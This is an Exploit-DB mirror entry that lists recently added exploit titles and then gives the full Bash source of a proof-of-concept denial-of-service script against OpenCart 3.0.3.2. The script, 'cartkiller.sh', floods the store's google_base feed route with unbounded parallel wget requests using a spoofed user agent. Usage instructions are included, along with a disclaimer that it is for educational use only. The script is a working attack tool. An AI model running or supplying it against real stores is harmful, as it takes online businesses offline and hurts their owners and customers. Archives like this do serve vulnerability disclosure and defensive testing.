exploit-db-mirror/exploits/php/webapps/46921.sh
Offensive Security 76aff025ee DB: 2019-05-25
9 changes to exploits/shellcodes

Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)
Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)
Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)
Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)
Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)
Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)

Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow

Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption

Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC
2019-05-25 05:01:58 +00:00

58 lines
No EOL
1.8 KiB
Bash
Executable file

#!/bin/bash
#
# Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
# PoC exploit, just for test...
# Tested on store with added more than 1000 products
# Usage: ./cartkiller.sh store_url threads sleep
# Example: ./cartkiller.sh https://store_name 50 5
#
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
echo "Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit"
echo
echo "Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>"
echo
echo "PoC exploit, just for test..."
echo "Tested on store with added more than 1000 products"
if [ -z "$3" ]; then
echo Usage: "$0" store_url threads sleep
echo Example: "$0" https://store_name 50 5
exit 4
fi
url="$1"
threads="$2"
sleep="$3"
while :
do
for ((i=1;i<=$2;i++));
do
wget "$url/index.php?route=extension/feed/google_base" --user-agent="Mozilla/5.0 (OpenCart Killer v2 google_base Denial Of Service)" --quiet -O /dev/null -o /dev/null &
done
#
# Sleep between loops..
#
sleep $sleep
done